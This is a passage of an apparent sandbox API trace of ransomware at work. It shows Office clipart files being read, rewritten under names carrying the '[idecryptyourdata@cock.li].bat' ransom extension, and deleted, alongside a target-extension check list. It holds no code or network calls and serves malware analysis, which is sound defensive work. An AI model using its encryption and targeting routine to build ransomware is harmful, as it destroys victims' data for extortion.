(lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212601.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.411] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212601.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212601.wmf")) returned 1 [0200.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212601.WMF") returned 68 [0200.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212601.WMF") returned 68 [0200.412] lstrlenW (lpString=".doc") returned 4 [0200.412] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.412] lstrlenW (lpString=".docx") returned 5 [0200.412] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0200.412] lstrlenW (lpString=".pdf") returned 4 [0200.412] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.412] lstrlenW (lpString=".xls") returned 4 [0200.412] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.412] lstrlenW (lpString=".xlsx") returned 5 [0200.413] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0200.413] lstrlenW (lpString=".ppt") returned 4 [0200.413] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212601.WMF") returned 68 [0200.413] lstrlenW (lpString=".zip") returned 4 [0200.413] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.413] lstrlenW (lpString=".rar") returned 4 [0200.413] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.413] lstrlenW (lpString=".bz2") returned 4 [0200.413] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.413] lstrlenW (lpString=".7z") returned 3 [0200.413] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212601.WMF") returned 68 [0200.413] lstrlenW (lpString=".dbf") returned 4 [0200.413] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212601.WMF") returned 68 [0200.413] lstrlenW (lpString=".1cd") returned 4 [0200.413] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212601.WMF") returned 68 [0200.413] lstrlenW (lpString=".jpg") returned 4 [0200.413] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.414] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.414] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212751.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212751.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0200.415] GetLastError () returned 0x0 [0200.415] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x80c, lpOverlapped=0x0) returned 1 [0200.638] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x810, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x810, lpOverlapped=0x0) returned 1 [0200.640] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.640] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.640] SetEndOfFile (hFile=0x390) returned 1 [0200.640] CloseHandle (hObject=0x390) returned 1 [0200.640] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.641] SetEndOfFile (hFile=0x378) returned 1 [0200.641] CloseHandle (hObject=0x378) returned 1 [0200.642] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212751.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.642] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212751.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212751.wmf")) returned 1 [0200.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212751.WMF") returned 68 [0200.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212751.WMF") returned 68 [0200.643] lstrlenW (lpString=".doc") returned 4 [0200.643] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.643] lstrlenW (lpString=".docx") returned 5 [0200.643] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0200.643] lstrlenW (lpString=".pdf") returned 4 [0200.643] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.643] lstrlenW (lpString=".xls") returned 4 [0200.643] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.643] lstrlenW (lpString=".xlsx") returned 5 [0200.643] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0200.643] lstrlenW (lpString=".ppt") returned 4 [0200.643] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212751.WMF") returned 68 [0200.643] lstrlenW (lpString=".zip") returned 4 [0200.643] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.643] lstrlenW (lpString=".rar") returned 4 [0200.643] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.643] lstrlenW (lpString=".bz2") returned 4 [0200.643] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.643] lstrlenW (lpString=".7z") returned 3 [0200.643] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212751.WMF") returned 68 [0200.643] lstrlenW (lpString=".dbf") returned 4 [0200.643] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212751.WMF") returned 68 [0200.643] lstrlenW (lpString=".1cd") returned 4 [0200.643] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212751.WMF") returned 68 [0200.644] lstrlenW (lpString=".jpg") returned 4 [0200.644] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.644] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.644] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.644] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215210.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215210.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0200.645] GetLastError () returned 0x0 [0200.645] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x81ce, lpOverlapped=0x0) returned 1 [0200.674] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x81d0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x81d0, lpOverlapped=0x0) returned 1 [0200.676] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.676] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.676] SetEndOfFile (hFile=0x390) returned 1 [0200.676] CloseHandle (hObject=0x390) returned 1 [0200.676] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.676] SetEndOfFile (hFile=0x378) returned 1 [0200.677] CloseHandle (hObject=0x378) returned 1 [0200.677] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215210.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.678] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215210.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215210.wmf")) returned 1 [0200.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215210.WMF") returned 68 [0200.678] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215210.WMF") returned 68 [0200.679] lstrlenW (lpString=".doc") returned 4 [0200.679] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.679] lstrlenW (lpString=".docx") returned 5 [0200.679] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0200.679] lstrlenW (lpString=".pdf") returned 4 [0200.679] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.679] lstrlenW (lpString=".xls") returned 4 [0200.679] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.679] lstrlenW (lpString=".xlsx") returned 5 [0200.679] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0200.679] lstrlenW (lpString=".ppt") returned 4 [0200.679] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215210.WMF") returned 68 [0200.679] lstrlenW (lpString=".zip") returned 4 [0200.679] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.679] lstrlenW (lpString=".rar") returned 4 [0200.679] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.679] lstrlenW (lpString=".bz2") returned 4 [0200.679] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.679] lstrlenW (lpString=".7z") returned 3 [0200.679] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215210.WMF") returned 68 [0200.679] lstrlenW (lpString=".dbf") returned 4 [0200.679] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215210.WMF") returned 68 [0200.679] lstrlenW (lpString=".1cd") returned 4 [0200.679] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.679] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215210.WMF") returned 68 [0200.679] lstrlenW (lpString=".jpg") returned 4 [0200.679] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.680] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.680] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215718.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215718.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0200.681] GetLastError () returned 0x0 [0200.681] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x15f2, lpOverlapped=0x0) returned 1 [0200.720] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x1600, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x1600, lpOverlapped=0x0) returned 1 [0200.721] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0200.721] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0200.721] SetEndOfFile (hFile=0x390) returned 1 [0200.721] CloseHandle (hObject=0x390) returned 1 [0200.721] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.721] SetEndOfFile (hFile=0x378) returned 1 [0200.722] CloseHandle (hObject=0x378) returned 1 [0200.722] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215718.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.722] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215718.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0215718.wmf")) returned 1 [0200.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215718.WMF") returned 68 [0200.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215718.WMF") returned 68 [0200.723] lstrlenW (lpString=".doc") returned 4 [0200.723] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.723] lstrlenW (lpString=".docx") returned 5 [0200.723] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0200.723] lstrlenW (lpString=".pdf") returned 4 [0200.723] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.723] lstrlenW (lpString=".xls") returned 4 [0200.723] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.723] lstrlenW (lpString=".xlsx") returned 5 [0200.723] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0200.723] lstrlenW (lpString=".ppt") returned 4 [0200.723] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215718.WMF") returned 68 [0200.723] lstrlenW (lpString=".zip") returned 4 [0200.723] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.723] lstrlenW (lpString=".rar") returned 4 [0200.723] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.723] lstrlenW (lpString=".bz2") returned 4 [0200.723] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.723] lstrlenW (lpString=".7z") returned 3 [0200.723] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215718.WMF") returned 68 [0200.724] lstrlenW (lpString=".dbf") returned 4 [0200.724] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215718.WMF") returned 68 [0200.724] lstrlenW (lpString=".1cd") returned 4 [0200.724] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.724] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0215718.WMF") returned 68 [0200.724] lstrlenW (lpString=".jpg") returned 4 [0200.724] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.724] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.724] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.724] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216540.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216540.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0200.725] GetLastError () returned 0x0 [0200.725] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0xa488, lpOverlapped=0x0) returned 1 [0201.637] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xa490, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xa490, lpOverlapped=0x0) returned 1 [0201.639] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.639] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0201.639] SetEndOfFile (hFile=0x390) returned 1 [0201.639] CloseHandle (hObject=0x390) returned 1 [0201.640] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.640] SetEndOfFile (hFile=0x378) returned 1 [0201.641] CloseHandle (hObject=0x378) returned 1 [0201.641] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216540.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0201.641] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216540.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216540.wmf")) returned 1 [0201.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216540.WMF") returned 68 [0201.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216540.WMF") returned 68 [0201.642] lstrlenW (lpString=".doc") returned 4 [0201.642] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0201.642] lstrlenW (lpString=".docx") returned 5 [0201.642] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0201.642] lstrlenW (lpString=".pdf") returned 4 [0201.642] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0201.642] lstrlenW (lpString=".xls") returned 4 [0201.642] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0201.642] lstrlenW (lpString=".xlsx") returned 5 [0201.642] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0201.642] lstrlenW (lpString=".ppt") returned 4 [0201.642] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0201.642] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216540.WMF") returned 68 [0201.642] lstrlenW (lpString=".zip") returned 4 [0201.642] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.642] lstrlenW (lpString=".rar") returned 4 [0201.643] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.643] lstrlenW (lpString=".bz2") returned 4 [0201.643] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0201.643] lstrlenW (lpString=".7z") returned 3 [0201.643] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0201.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216540.WMF") returned 68 [0201.643] lstrlenW (lpString=".dbf") returned 4 [0201.643] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216540.WMF") returned 68 [0201.643] lstrlenW (lpString=".1cd") returned 4 [0201.643] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0201.643] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216540.WMF") returned 68 [0201.643] lstrlenW (lpString=".jpg") returned 4 [0201.643] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0201.643] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.643] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.644] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216612.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216612.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0201.644] GetLastError () returned 0x0 [0201.644] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x24e2, lpOverlapped=0x0) returned 1 [0201.731] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0x24f0, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0x24f0, lpOverlapped=0x0) returned 1 [0201.733] ReadFile (in: hFile=0x378, lpBuffer=0x39f4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2e9fecc, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesRead=0x2e9fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.733] WriteFile (in: hFile=0x390, lpBuffer=0x39f4020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2e9fc94, lpOverlapped=0x0 | out: lpBuffer=0x39f4020*, lpNumberOfBytesWritten=0x2e9fc94*=0xec, lpOverlapped=0x0) returned 1 [0201.733] SetEndOfFile (hFile=0x390) returned 1 [0201.733] CloseHandle (hObject=0x390) returned 1 [0201.733] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e9fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.733] SetEndOfFile (hFile=0x378) returned 1 [0201.734] CloseHandle (hObject=0x378) returned 1 [0201.734] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216612.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0201.734] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216612.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216612.wmf")) returned 1 [0201.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216612.WMF") returned 68 [0201.735] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216612.WMF") returned 68 [0201.735] lstrlenW (lpString=".doc") returned 4 [0201.735] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0201.735] lstrlenW (lpString=".docx") returned 5 [0201.735] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1 [0201.735] lstrlenW (lpString=".pdf") returned 4 [0201.735] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0201.735] lstrlenW (lpString=".xls") returned 4 [0201.735] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0201.735] lstrlenW (lpString=".xlsx") returned 5 [0201.735] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1 [0201.736] lstrlenW (lpString=".ppt") returned 4 [0201.736] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0201.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216612.WMF") returned 68 [0201.736] lstrlenW (lpString=".zip") returned 4 [0201.736] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.736] lstrlenW (lpString=".rar") returned 4 [0201.736] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.736] lstrlenW (lpString=".bz2") returned 4 [0201.736] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0201.736] lstrlenW (lpString=".7z") returned 3 [0201.736] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0201.736] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216612.WMF") returned 68 [0201.736] 